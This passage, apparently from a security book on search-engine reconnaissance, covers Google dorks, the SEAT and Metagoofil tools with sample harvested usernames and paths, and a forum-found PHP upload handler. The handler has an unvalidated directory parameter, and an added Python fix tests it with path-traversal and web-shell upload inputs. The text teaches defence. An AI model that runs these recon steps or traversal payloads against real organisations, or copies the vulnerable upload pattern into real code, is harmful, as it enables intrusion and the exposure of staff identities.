SEAT supports multiple search engines, including Google, Yahoo!, and MSN. SEAT also has a variety of built-in dorks. The databases that SEAT uses (shown in Figure 1-5) were compiled from multiple sources, including the GHDB and Nikto.
An attacker can select multiple databases and search engines when using SEAT. Along with SEAT’s multithreading, these features aid the attacker greatly when he’s gathering information via search engine hacking. Figure 1-6 shows SEAT during the execution stage running 15 simultaneous queries.
Note
You can obtain the latest version of SEAT from http://midnightresearch.com/projects/search-engine-assessment-tool/.
Extracting Metadata from Online Documents
Metadata is “data about other data.” A good example of metadata is the data that is often inserted into Microsoft Office documents such as Word. For instance, Microsoft Word inserts data such as usernames and folder paths of the author’s machine. Attackers can extract this metadata from documents that corporations have put online.
Using search engines, attackers can use specific directives to limit their results to specific file types that are known to include metadata. For example, the Google directive filetype:doc will return only Microsoft Word files. The following is a query that returns only PowerPoint presentations that contain the phrase “Q4 Expenses”:
filetype:ppt "Q4 Expenses"
Figure 1-5. SEAT’s different built-in vulnerability databases
Attackers query Google using such queries; then they download the documents that are returned and examine them, pulling out any metadata stored within them.
Metagoofil is an automated tool that queries Google for documents of the file types that are known to carry metadata. Given a domain, it searches Google for each file type, downloads the files that are returned, and then extracts the metadata from them. Here is a demonstration of Metagoofil being used against example.com:
$ python metagoofil.py -d example.com -f all -l 3 -o example.html -t DL
*************************************
*MetaGooFil Ver. 1.4a *
*Coded by Christian Martorella *
*Edge-Security Research *
*cmartorella@edge-security.com *
*************************************
[+] Command extract found, proceeding with leeching
[+] Searching in example.com for: pdf
[+] Total results in google: 5300
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.pdf
[ 2/3 ] http://www.example.com/english/lic/gl_app2.pdf
[ 3/3 ] http://www.example.com/english/lic/gl_app3.pdf
[+] Searching in example.com for: doc
[+] Total results in google: 1500
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.doc
[ 2/3 ] http://www.example.com/english/lic/gl_app2.doc
[ 3/3 ] http://www.example.com/english/lic/gl_app3.doc
[+] Searching in example.com for: xls
[+] Total results in google: 20
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.xls
[ 2/3 ] http://www.example.com/english/lic/gl_app2.xls
[ 3/3 ] http://www.example.com/english/lic/gl_app3.xls
[+] Searching in example.com for: ppt
[+] Total results in google: 60
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.ppt
[ 2/3 ] http://www.example.com/english/lic/gl_app1.ppt
[ 3/3 ] http://www.example.com/english/lic/gl_app1.ppt
[+] Searching in example.com for: sdw
[+] Total results in google: 0
[+] Searching in example.com for: mdb
[+] Total results in google: 0
[+] Searching in example.com for: sdc
[+] Total results in google: 0
[+] Searching in example.com for: odp
[+] Total results in google: 0
[+] Searching in example.com for: ods
[+] Total results in google: 0
Usernames found:
================
rmiyazaki
tyamanda
hlee
akarnik
April Jacobs
Rwood
Amatsuda
Dmaha
Dock, Matt
Paths found:
============
C:\WINNT\Profiles\Dmaha\
C:\TEMP\Dmaha\
C:\Program Files\Microsoft Office\Templates\Presentation Designs\example
C:\WINNT\Profiles\Rwood
[+] Process finished
Figure 1-6. SEAT using 15 threads, searching for vulnerabilities using multiple search engines
Note
The publicly available Python script metagoofil.py aids in searching, gathering, and extracting metadata from documents. It is available from http://www.edge-security.com/metagoofil.php.
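The usernames and paths in the output above come from a handful of metadata fields: the creator and last-modified-by entries in an Office file's document properties, the attached template path, and the Info dictionary of a PDF. The following added example (not Metagoofil's code) pulls those fields out of an OOXML document and a PDF and merges them into the same two lists Metagoofil prints. Both documents are built in memory as constructed fixtures so that it runs offline; the names and paths in them are invented for the example.

```python
"""Extract the author names and local paths that documents carry in their
metadata, the two lists Metagoofil prints as "Usernames found" and
"Paths found".

Added example, not Metagoofil's code. Both documents below are built in
memory as constructed fixtures so the script runs offline; real files are
handled by passing their bytes to report().
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
# A drive letter followed by a backslash path, ending at XML or PDF string
# delimiters. Spaces are allowed ("Program Files"), so in free text the
# match may run past the path; inside a metadata field the delimiter ends it.
WIN_PATH = re.compile(r'''[A-Za-z]:\\[^<>()"'|*?\r\n]+''')
PDF_STRING = re.compile(rb"/(Author|Creator|Producer|Title)\s*\(([^)]*)\)")


def ooxml_metadata(data: bytes) -> dict:
    """docProps/core.xml names the creator and last editor; docProps/app.xml
    names the attached template, which is often a full local path."""
    found = {"users": set(), "paths": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            for tag in ("dc:creator", "cp:lastModifiedBy"):
                el = core.find(tag, NS)
                if el is not None and el.text and el.text.strip():
                    found["users"].add(el.text.strip())
        # Paths can sit in any XML part (template, OLE links, hyperlinks),
        # so scan every part rather than only app.xml.
        for name in names:
            if name.endswith((".xml", ".rels")):
                text = z.read(name).decode("utf-8", "replace")
                found["paths"].update(WIN_PATH.findall(text))
    return found


def pdf_metadata(data: bytes) -> dict:
    """Read literal strings from the Info dictionary. Caveat: strings inside
    a compressed object stream, hex strings or XMP need a real PDF parser."""
    found = {"users": set(), "paths": set()}
    for key, value in PDF_STRING.findall(data):
        text = value.decode("latin-1").strip()
        if key == b"Author" and text:
            found["users"].add(text)
    found["paths"].update(WIN_PATH.findall(data.decode("latin-1")))
    return found


def report(docs: dict) -> dict:
    """Dispatch on magic bytes and merge results into Metagoofil-style lists."""
    users, paths = set(), set()
    for _name, data in docs.items():
        if data.startswith(b"PK"):
            found = ooxml_metadata(data)
        elif data.startswith(b"%PDF"):
            found = pdf_metadata(data)
        else:
            continue  # legacy .doc/.xls (OLE2) need the olefile module; not handled here
        users |= found["users"]
        paths |= found["paths"]
    return {"users": sorted(users), "paths": sorted(paths)}


def build_docx(creator: str, last_modified_by: str, template: str) -> bytes:
    """Constructed fixture: the minimum parts needed to exercise the parser."""
    core = (f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
            f'<dc:creator>{creator}</dc:creator>'
            f'<cp:lastModifiedBy>{last_modified_by}</cp:lastModifiedBy>'
            '</cp:coreProperties>')
    app = f'<Properties xmlns="{NS["ep"]}"><Template>{template}</Template></Properties>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
        z.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


# Constructed sample documents; the names and paths are invented.
SAMPLE_DOCS = {
    "gl_app1.docx": build_docx("bsmith", "Alice Ng",
                               r"C:\Program Files\Microsoft Office\Templates\example.dotx"),
    "gl_app1.pdf": (b"%PDF-1.4\n1 0 obj\n<< /Author (Alice Ng) /Creator (Microsoft Word)"
                    b" /Title (C:\\TEMP\\bsmith\\gl_app1.doc) >>\nendobj\n%%EOF\n"),
}

if __name__ == "__main__":
    result = report(SAMPLE_DOCS)
    print("Usernames found:", *result["users"], sep="\n  ")
    print("Paths found:", *result["paths"], sep="\n  ")
```

The defensive counterpart is the same scan run over documents before they are published: anything `report` returns is a username or internal path that will be handed to the next person who runs Metagoofil against the domain.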
Searching for Source Code
Developers will often post code on public forums when they discover a bug they cannot solve. Too often, these developers will post code without redacting it in any way. It is unsettling how often these forums display code that clearly belongs to a specific organization.
The developer’s name, internal comments, code descriptions, and organizational ownership are among the items you can find in source code that is posted on public forums on the Internet.
Using Google, it is trivial to find some of this code in a short period of time. Using search terms such as “here is the code” and “here is the exact code” will return many results. Here is a code snippet that we found using Google (the code has been redacted):
<?php
$error = "";  // Set a variable that will be used for errors
$sendTo = ""; // Set a variable that will be used for emailing
// Form is submitted
if(isset($_POST['upload']) && $_POST['upload'] == 'Upload File')
{
    $whereto = $_POST['where']; // Gets post value from select menu
    // Gets file value from file upload input
    $whatfile = $_FILES['uploadedfile']['name'];
    // This is the subject that will appear in the email
    $subject = "File uploaded to ". $whereto ." directory";
    $from = "FTP UPLOAD <noreply@redacted.com>";
    // Checks to see if $whereto is empty, if so echo error
    if(empty($whereto))
    {
        $error = "You need to choose a directory.<br />";
    }
    // Checks to see if file input field is empty, if so throw an error
    if($whatfile == NULL) {
        $error .= "You need to choose a file.";
    }
    //if no errors so far then continue uploading
    if(!empty($whereto) && $whatfile != NULL) {
        $target_path = "$whereto/"; // The directory the file will be placed
        ...
This code snippet describes upload functionality on a web server. Notice that $whereto is taken straight from the POST parameter where and used to build $target_path without any validation beyond an emptiness check, and that the file name comes unfiltered from the upload. An attacker can use this code to reverse-engineer how to get a file into a different directory, or how to bypass the security mechanisms that are in place.
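What the attacker reads out of that snippet is that the where parameter picks the destination directory and that nothing constrains it. The following added example, written in Python rather than the original's PHP and not taken from the page, puts the snippet's path construction next to the check it should have had. UPLOAD_ROOT, the allowed directory names and the allowed extensions are assumptions standing in for the values the original form's select menu would offer, and the attack inputs are constructed.

```python
"""The upload destination from the found PHP, re-implemented in Python to
show what an attacker gets from reading it and what the check should be.

Added example, not from the page. UPLOAD_ROOT, ALLOWED_DIRS and ALLOWED_EXT
are assumptions standing in for the values the original select menu offers.
"""
import posixpath
import re

UPLOAD_ROOT = "/var/www/uploads"                     # assumed
ALLOWED_DIRS = {"contracts", "invoices", "images"}   # assumed select-menu values
ALLOWED_EXT = {"pdf", "png", "jpg"}                  # assumed
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


class UploadRejected(ValueError):
    """Raised when a client-supplied directory or file name fails validation."""


def unsafe_target(whereto: str, filename: str) -> str:
    """What the found code does: "$whereto/" followed by the uploaded name,
    both straight from the request. Whoever read the snippet knows that
    'where' chooses the directory and that nothing constrains it."""
    return f"{whereto}/{filename}"


def safe_target(whereto: str, filename: str, root: str = UPLOAD_ROOT) -> str:
    """Accept only a known directory name and a plain, allow-listed file name,
    then verify the joined path still sits under root (defence in depth)."""
    if whereto not in ALLOWED_DIRS:
        raise UploadRejected(f"directory not in allowlist: {whereto!r}")
    # Reject rather than normalise: a name carrying a separator is an attack
    # attempt worth logging, not something to quietly repair.
    if posixpath.basename(filename) != filename or not SAFE_NAME.match(filename):
        raise UploadRejected(f"bad file name: {filename!r}")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension not allowed: {ext!r}")
    target = posixpath.normpath(posixpath.join(root, whereto, filename))
    if posixpath.commonpath([root, target]) != root:
        raise UploadRejected("resolved path escapes the upload root")
    return target


def is_rejected(whereto: str, filename: str) -> bool:
    """True when safe_target refuses the pair; keeps callers free of try/except."""
    try:
        safe_target(whereto, filename)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed attack inputs of the kind the snippet invites.
    attempts = [
        ("contracts", "q4.pdf"),                 # legitimate
        ("../../var/www/html", "shell.php"),     # traversal through 'where'
        ("contracts", "../shell.php"),           # traversal through the file name
        ("contracts", "shell.php"),              # executable upload
    ]
    for where, name in attempts:
        verdict = "rejected" if is_rejected(where, name) else safe_target(where, name)
        print(f"{where}/{name}: unsafe -> {unsafe_target(where, name)}; safe -> {verdict}")
```

The allowlist on the directory is the fix the snippet actually needs; the basename, character-set and extension checks close the second parameter the attacker controls, and the `commonpath` comparison is there so a later change to the allowlist cannot reopen the hole. Whatever the checks, the upload root should also be served with script execution disabled, since a double extension such as `shell.php.png` passes an extension allowlist.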